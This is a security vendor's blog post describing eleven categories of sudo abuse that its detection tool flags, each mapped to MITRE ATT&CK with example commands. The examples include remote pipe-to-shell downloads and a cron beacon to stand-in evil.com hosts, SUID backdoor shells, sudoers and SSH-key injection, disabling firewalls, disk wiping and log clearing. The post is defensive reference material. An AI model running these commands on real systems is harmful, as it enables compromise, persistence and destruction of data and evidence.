Threat Detection

11 Types of Sudo Abuse Inner Warden Detects (MITRE ATT&CK Mapped)

Name: Inner Warden
Author: Inner Warden

March 21, 202612 min read

Sudo abuse is not just "too many sudo commands." It is a diverse set of techniques that attackers use after gaining initial access to escalate privileges, establish persistence, cover tracks, and move laterally. Inner Warden classifies sudo commands into 11 distinct categories, each mapped to MITRE ATT&CK techniques, with proportional severity scoring.

This reference covers every category: what it means, what commands trigger it, the MITRE mapping, and how severity is calculated.

All 11 categories at a glance

Category	MITRE ATT&CK	Base severity
identity_change	T1136 (Create Account)	High
privilege_policy_change	T1548.003 (Sudo/Sudo Caching)	Critical
suid_manipulation	T1548.001 (Setuid/Setgid)	Critical
security_control_change	T1562.001 (Disable Security Tools)	Critical
remote_script_execution	T1059.004 (Unix Shell)	Critical
service_disruption	T1489 (Service Stop)	High
ssh_key_injection	T1098.004 (SSH Authorized Keys)	Critical
cron_persistence	T1053.003 (Cron)	High
tmp_execution	T1036.005 (Match Legitimate Name)	High
destructive_command	T1485 (Data Destruction)	Critical
log_tampering	T1070.002 (Clear Linux Logs)	Critical

Detailed breakdown

1. identity_change

Creating or modifying user accounts with elevated privileges. An attacker with sudo creates a backdoor account to maintain access even if their initial entry point is discovered.

sudo useradd -m -s /bin/bash backdoor
sudo usermod -aG sudo backdoor
sudo passwd deploy

MITRE: T1136 (Create Account) | Severity: High (Critical if adding to sudo group)

2. privilege_policy_change

Modifying the sudoers file to grant additional privileges or remove password requirements. This is one of the most dangerous categories because it makes privilege escalation permanent and silent.

sudo visudo
sudo echo "deploy ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
sudo chmod 440 /etc/sudoers

MITRE: T1548.003 (Abuse Elevation Control - Sudo) | Severity: Critical

3. suid_manipulation

Setting the SUID bit on binaries so they run as root regardless of who executes them. A classic persistence technique: the attacker sets SUID on a copy of bash, then can get root without sudo at any time.

sudo chmod u+s /usr/bin/find
sudo chmod 4755 /tmp/backdoor
sudo cp /bin/bash /tmp/.hidden && sudo chmod u+s /tmp/.hidden

MITRE: T1548.001 (Setuid and Setgid) | Severity: Critical

4. security_control_change

Disabling firewalls, stopping security services, or modifying security configurations. The attacker removes the defenses before proceeding with their objective.

sudo ufw disable
sudo systemctl stop fail2ban
sudo iptables -F
sudo setenforce 0
sudo systemctl stop apparmor

MITRE: T1562.001 (Impair Defenses - Disable Security Tools) | Severity: Critical

5. remote_script_execution

Downloading and executing scripts from remote URLs with elevated privileges. This is how crypto miners, rootkits, and botnet agents are typically deployed.

sudo curl -s http://evil.com/miner.sh | bash
sudo wget -qO- http://evil.com/install | sh
sudo bash -c "$(curl -fsSL http://evil.com/setup)"

MITRE: T1059.004 (Command and Scripting - Unix Shell) | Severity: Critical

6. service_disruption

Stopping or restarting critical services. Could be sabotage, preparation for a replacement service, or disruption to cover other activities.

sudo systemctl stop nginx
sudo systemctl stop sshd
sudo kill -9 $(pidof postgres)

MITRE: T1489 (Service Stop) | Severity: High (Critical if stopping security services)

7. ssh_key_injection

Adding SSH keys to authorized_keys files for passwordless persistent access. This is the most common persistence mechanism after initial compromise.

sudo echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys
sudo tee -a /home/ubuntu/.ssh/authorized_keys <<< "ssh-ed25519 ..."
sudo cp /tmp/key.pub /root/.ssh/authorized_keys

MITRE: T1098.004 (Account Manipulation - SSH Authorized Keys) | Severity: Critical

8. cron_persistence

Creating or modifying cron jobs for scheduled execution. Attackers use cron to re-establish access if their main backdoor is discovered, or to periodically phone home.

sudo crontab -e
sudo echo "*/5 * * * * curl http://c2.evil.com/beacon" >> /etc/crontab
sudo cp /tmp/backdoor.cron /etc/cron.d/system-update

MITRE: T1053.003 (Scheduled Task/Job - Cron) | Severity: High

9. tmp_execution

Executing binaries from /tmp, /dev/shm, or other world-writable directories. Legitimate software is never executed from /tmp. This is a strong indicator of malicious activity.

sudo /tmp/exploit
sudo chmod +x /dev/shm/miner && sudo /dev/shm/miner
sudo bash /tmp/.hidden/payload.sh

MITRE: T1036.005 (Masquerading - Match Legitimate Name) | Severity: High

10. destructive_command

Commands that delete, overwrite, or wipe data. These are used for sabotage, ransom preparation, or covering tracks by destroying evidence.

sudo rm -rf /
sudo dd if=/dev/zero of=/dev/sda
sudo mkfs.ext4 /dev/sda1
sudo shred -vfz /var/log/*

MITRE: T1485 (Data Destruction) | Severity: Critical

11. log_tampering

Clearing, truncating, or modifying log files to remove evidence of the attacker's activities. This is often the last step before the attacker goes quiet.

sudo truncate -s 0 /var/log/auth.log
sudo echo "" > /var/log/syslog
sudo journalctl --vacuum-time=1s
sudo rm /var/log/wtmp /var/log/btmp

MITRE: T1070.002 (Indicator Removal - Clear Linux Logs) | Severity: Critical

How severity scoring works

Inner Warden uses proportional severity scoring. A single suspicious command gets its base severity. Multiple commands from the same user in a short window escalate the severity:

1 command, non-critical categoryMedium

1 command, critical categoryHigh

3+ commands, any categoryHigh

5+ commands with critical categoriesCritical

Multiple categories in same sessionCritical

This prevents alert fatigue. A developer running sudo systemctl restart nginx does not trigger an alert. But if they also run sudo useradd and sudo chmod u+s in the same window, that is a critical incident regardless of the individual command severities.

Set it up

All 11 sudo abuse categories are detected out of the box. Install Inner Warden and enable sudo protection:

Install

curl -fsSL https://innerwarden.com/install | sudo bash

Enable sudo protection

innerwarden enable sudo-protection

Detection starts immediately in dry-run mode. Review the detections, then enable automated response when you trust the output.

What to do next

Sudo abuse monitoring guide - learn about the sliding window detection and automatic sudo suspension with TTL.
Suspicious login detection - sudo abuse usually follows a compromised login. Catch the initial breach.
Obfuscated reverse shell detection - another post-compromise technique that often accompanies sudo abuse.